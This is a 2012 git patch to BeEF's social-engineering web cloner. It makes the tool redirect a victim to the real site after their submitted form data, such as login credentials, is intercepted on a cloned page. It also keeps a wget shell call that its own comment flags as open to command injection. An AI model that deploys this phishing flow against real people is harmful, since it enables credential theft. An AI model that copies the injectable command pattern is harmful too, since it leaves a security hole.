From 0260181d33fc7088b34a5b1101f0102f55c2f6ea Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 29 Aug 2012 19:33:14 +0100
Subject: [PATCH] Social Eng. extension: added redirection after POST
 interception, refactored Interceptor class

---
 .../web_cloner/interceptor.rb                 | 16 +++++----
 .../web_cloner/web_cloner.rb                  | 36 ++++---------------
 2 files changed, 15 insertions(+), 37 deletions(-)

diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index 7eba2ad46..af6a899cd 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -19,13 +19,13 @@ module BeEF
 
       class Interceptor < Sinatra::Base
 
-      def initialize(file_path)
-        super
-        @config = BeEF::Core::Configuration.instance
-        @cloned_page = ""
-        File.open(file_path,'r').each do |line|
-          @cloned_page += line
-        end
+      def initialize(file_path, redirect_to)
+        super self
+        file = File.open(file_path,'r')
+        @cloned_page = file.read
+        @redirect_to = redirect_to
+        file.close
+        print_info "Cloned page using content from [cloned_pages/#{File.basename(file_path)}] initialized."
       end
 
       # intercept GET
@@ -44,6 +44,8 @@ module BeEF
         print_info "Intercepted data:"
         print_info data
 
+        redirect @redirect_to
+
         #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
         #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
         #todo: to the original page
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index f962b4e90..1261f51c8 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -27,40 +27,16 @@ module BeEF
         end
 
         def clone_page(url)
-          #todo see web_cloner.rb, work perfectly
-          # output.html and output2.html (the one with the form action modified to /)
-          # must be stored in cloned_pages
           print_info "Cloning page at URL #{url}"
           uri = URI(url)
-
-          #output = url.split("/").last #todo test if http://google.com/ produces an error
           output = uri.host
           output_mod = "#{output}_mod"
-
           user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
 
-          #todo: prevent Command Injection
-          wget = "wget '#{url}' -O #{@cloned_pages_dir + output} --no-check-certificate -c -k -U '#{user_agent}'"
-          IO.popen(wget.to_s) { |f| @result = f.gets }
-          print_debug @result
-          #todo, also check if the URL is valid with:
-          #unless (url =~ URI::regexp).nil?
-          #  # Correct URL
-          #end
-
-          #todo: this should be the good way to prevent command injection, because the shell is not open.
-          #todo: there are issues:  Scheme missing when calling wget
-          #wget_path   = "wget"
-          #env         = {}
-          #args        = %W['#{url}' -O #{output} --no-check-certificate -c -k -U #{user_agent}]
-          #IO.popen([env, wget_path, *args], 'r+') { |f| @result = f.gets }
-
-
-          #if !File.writable?(File.basename(@cloned_pages_dir + output_mod))
-          #  print_info "Cannot write to file..."
-          #  IO.popen("chmod 777 #{@cloned_pages_dir}") { |f| @result = f.gets }
-          #  sleep 2
-          #end
+          #todo: prevent command injection using IO.popen passing an array of arguments
+          # see here: http://devblog.avdi.org/2012/03/29/generating-cows-with-io-popen/
+          wget = "wget '#{url}' --no-check-certificate -c -k -U '#{user_agent}' -O #{@cloned_pages_dir + output}"
+          IO.popen(wget.to_s) { |f| result = f.gets }
 
           File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
             File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
@@ -92,8 +68,8 @@ module BeEF
           print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
 
           file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
-          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path))
-          print_info "Mounting cloned page on URL #{output}"
+          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url))
+          print_info "Mounting cloned page on URL [/#{output}]"
           @http_server.remap
         end